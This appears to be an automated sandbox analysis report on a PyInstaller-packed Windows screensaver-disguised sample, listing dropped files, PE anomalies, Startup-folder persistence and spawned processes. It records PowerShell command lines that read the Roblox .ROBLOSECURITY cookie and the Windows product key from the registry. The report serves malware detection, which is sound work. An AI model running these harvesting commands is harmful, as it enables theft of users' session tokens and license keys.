Source:	Binary string: api-ms-win-core-processthreads-l1-1-1.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2036953380.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\Projects\WinRAR\rar\build\rar64\Release\RAR.pdb source: rar.exe, 00000044.00000000.2208106332.00007FF7F7EF0000.00000002.00000001.01000000.0000001B.sdmp, rar.exe, 00000044.00000002.2226760663.00007FF7F7EF0000.00000002.00000001.01000000.0000001B.sdmp
Source:	Binary string: api-ms-win-core-namedpipe-l1-1-0.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2036690975.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\select.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2343092804.00007FF8B9841000.00000040.00000001.01000000.0000000E.sdmp
Source:	Binary string: api-ms-win-crt-utility-l1-1-0.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2038915705.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-rtlsupport-l1-1-0.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2037125137.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-timezone-l1-1-0.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2037632410.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-string-l1-1-0.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2037218357.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-file-l2-1-0.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2035650264.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\libssl-3.pdbEE source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2339702487.00007FF8A9355000.00000040.00000001.01000000.00000011.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_lzma.pdbNN source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2341409452.00007FF8B8F8C000.00000040.00000001.01000000.00000009.sdmp
Source:	Binary string: api-ms-win-crt-process-l1-1-0.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2038406109.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-libraryloader-l1-1-0.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2036066040.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_queue.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2341828225.00007FF8B9061000.00000040.00000001.01000000.00000013.sdmp
Source:	Binary string: api-ms-win-core-interlocked-l1-1-0.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2035945476.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_sqlite3.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2341133552.00007FF8B8CD1000.00000040.00000001.01000000.0000000B.sdmp
Source:	Binary string: D:\a\1\b\libssl-3.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2339702487.00007FF8A9355000.00000040.00000001.01000000.00000011.sdmp
Source:	Binary string: api-ms-win-crt-heap-l1-1-0.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2038117369.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-crt-string-l1-1-0.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2038707513.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_ssl.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2340532745.00007FF8B8B11000.00000040.00000001.01000000.0000000F.sdmp

Source: #U202f#U202f#U2005#U00a0.scr.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: #U202f#U202f#U2005#U00a0.scr.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: #U202f#U202f#U2005#U00a0.scr.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: #U202f#U202f#U2005#U00a0.scr.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: #U202f#U202f#U2005#U00a0.scr.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Data Obfuscation

Suspicious powershell command line found

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault

Source: api-ms-win-core-console-l1-1-0.dll.0.dr

Static PE information: 0xA9D30DED [Wed Apr 14 15:12:45 2060 UTC]

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\xuxqeuoy\xuxqeuoy.cmdline"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\xuxqeuoy\xuxqeuoy.cmdline"

Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe

Code function: 2_2_00007FF8A86A7B30 EntryPoint,LoadLibraryA,GetProcAddress,VirtualProtect,VirtualProtect,VirtualProtect,

2_2_00007FF8A86A7B30

Source: _sqlite3.pyd.0.dr	Static PE information: real checksum: 0x0 should be: 0x11538
Source: unicodedata.pyd.0.dr	Static PE information: real checksum: 0x0 should be: 0x4f1a1
Source: _ssl.pyd.0.dr	Static PE information: real checksum: 0x0 should be: 0x1972f
Source: libcrypto-3.dll.0.dr	Static PE information: real checksum: 0x0 should be: 0x192b2f
Source: _decimal.pyd.0.dr	Static PE information: real checksum: 0x0 should be: 0x1c088
Source: #U202f#U202f#U2005#U00a0.scr.exe	Static PE information: real checksum: 0x8219e0 should be: 0x827320
Source: _lzma.pyd.0.dr	Static PE information: real checksum: 0x0 should be: 0x1ac45
Source: _bz2.pyd.0.dr	Static PE information: real checksum: 0x0 should be: 0x188ee
Source: libffi-8.dll.0.dr	Static PE information: real checksum: 0x0 should be: 0xa1d1
Source: python312.dll.0.dr	Static PE information: real checksum: 0x0 should be: 0x1c135b
Source: _queue.pyd.0.dr	Static PE information: real checksum: 0x0 should be: 0x8181
Source: _socket.pyd.0.dr	Static PE information: real checksum: 0x0 should be: 0x14b65
Source: _hashlib.pyd.0.dr	Static PE information: real checksum: 0x0 should be: 0xb5c7
Source: libssl-3.dll.0.dr	Static PE information: real checksum: 0x0 should be: 0x396d1
Source: select.pyd.0.dr	Static PE information: real checksum: 0x0 should be: 0x6d48
Source: _ctypes.pyd.0.dr	Static PE information: real checksum: 0x0 should be: 0x1e3bf
Source: sqlite3.dll.0.dr	Static PE information: real checksum: 0x0 should be: 0xaa20d
Source: xuxqeuoy.dll.43.dr	Static PE information: real checksum: 0x0 should be: 0x85b8

Source: #U202f#U202f#U2005#U00a0.scr.exe	Static PE information: section name: _RDATA
Source: VCRUNTIME140.dll.0.dr	Static PE information: section name: fothk
Source: VCRUNTIME140.dll.0.dr	Static PE information: section name: _RDATA
Source: libffi-8.dll.0.dr	Static PE information: section name: UPX2

Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Code function: 0_2_00007FF73AE55004 push rsp; retf	0_2_00007FF73AE55005
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Code function: 2_2_00007FF8A8095F01 push r12; ret	2_2_00007FF8A8095F10
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Code function: 2_2_00007FF8A8095D06 push r12; ret	2_2_00007FF8A8095D08
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Code function: 2_2_00007FF8A8097FFF push r12; ret	2_2_00007FF8A809804A
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Code function: 2_2_00007FF8A8095C31 push r10; ret	2_2_00007FF8A8095C33
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Code function: 2_2_00007FF8A8099327 push rsp; ret	2_2_00007FF8A8099328
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Code function: 2_2_00007FF8A8095E18 push rsp; ret	2_2_00007FF8A8095E1C
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Code function: 2_2_00007FF8A8098419 push r10; retf	2_2_00007FF8A8098485
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Code function: 2_2_00007FF8A8095F56 push r12; ret	2_2_00007FF8A8095F73
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Code function: 2_2_00007FF8A8098F42 push rsp; iretq	2_2_00007FF8A8098F43
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Code function: 2_2_00007FF8A809763E push rbp; retf	2_2_00007FF8A8097657
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Code function: 2_2_00007FF8A8095E67 push rdi; iretd	2_2_00007FF8A8095E69
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Code function: 2_2_00007FF8A8097F67 push rbp; iretq	2_2_00007FF8A8097F68
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Code function: 2_2_00007FF8A8096859 push rsi; ret	2_2_00007FF8A8096890
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Code function: 2_2_00007FF8A8097689 push r12; ret	2_2_00007FF8A80976CD
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Code function: 2_2_00007FF8A809808B push r12; iretd	2_2_00007FF8A809809F
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Code function: 2_2_00007FF8A8095F7B push r8; ret	2_2_00007FF8A8095F83
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Code function: 2_2_00007FF8A8095EB4 push rsp; iretd	2_2_00007FF8A8095EB5
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Code function: 2_2_00007FF8A8095FB9 push r10; ret	2_2_00007FF8A8095FCC
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Code function: 2_2_00007FF8A8098DBF push rsp; retf	2_2_00007FF8A8098DC0
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Code function: 2_2_00007FF8A8095DF7 push r10; retf	2_2_00007FF8A8095DFA
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Code function: 2_2_00007FF8A8095CED push rdx; ret	2_2_00007FF8A8095CF7
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Code function: 2_2_00007FF8A8095CE0 push r10; retf	2_2_00007FF8A8095CE2
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Code function: 2_2_00007FF8A8095CE5 push r8; ret	2_2_00007FF8A8095CEB
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Code function: 2_2_00007FF8A80982D8 push rdi; iretd	2_2_00007FF8A80982DA
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Code function: 2_2_00007FF8A872161E push rdx; iretd	2_2_00007FF8A8721621
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 7_2_00007FF84769D2A5 pushad ; iretd	7_2_00007FF84769D2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 7_2_00007FF8477B00BD pushad ; iretd	7_2_00007FF8477B00C1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 7_2_00007FF8477B83FC push ebx; ret	7_2_00007FF8477B847A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 7_2_00007FF8477B85FD push ebx; ret	7_2_00007FF8477B860A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 7_2_00007FF8477B860B push ebx; ret	7_2_00007FF8477B860A

Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1

Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-core-processthreads-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-core-interlocked-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI17882\_bz2.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-core-namedpipe-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-core-file-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-core-processthreads-l1-1-1.dll	Jump to dropped file
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-core-debug-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-core-util-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI17882\rar.exe	Jump to dropped file
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-crt-time-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI17882\_sqlite3.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-core-timezone-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI17882\ucrtbase.dll	Jump to dropped file
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-crt-environment-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-crt-process-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI17882\_socket.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-core-memory-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-core-errorhandling-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-core-localization-l1-2-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI17882\_decimal.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-core-file-l2-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-crt-utility-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI17882\_ctypes.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-crt-math-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI17882\_hashlib.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-core-string-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-core-sysinfo-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI17882\_queue.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-crt-stdio-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-core-heap-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-core-synch-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-core-processenvironment-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI17882\sqlite3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI17882\libcrypto-3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-core-file-l1-2-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI17882\_lzma.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-crt-heap-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-core-console-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI17882\libssl-3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-core-libraryloader-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-crt-locale-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-core-synch-l1-2-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI17882\select.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-core-datetime-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-core-rtlsupport-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI17882\libffi-8.dll	Jump to dropped file
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-core-profile-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI17882\_ssl.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-crt-convert-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-crt-filesystem-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI17882\VCRUNTIME140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-crt-runtime-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-core-handle-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-crt-string-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-crt-conio-l1-1-0.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File created: C:\Users\user\AppData\Local\Temp\xuxqeuoy\xuxqeuoy.dll	Jump to dropped file
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI17882\unicodedata.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI17882\python312.dll	Jump to dropped file

Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe

File created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\? ? .scr

Jump to behavior

Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe

File created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\? ? .scr

Jump to behavior

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
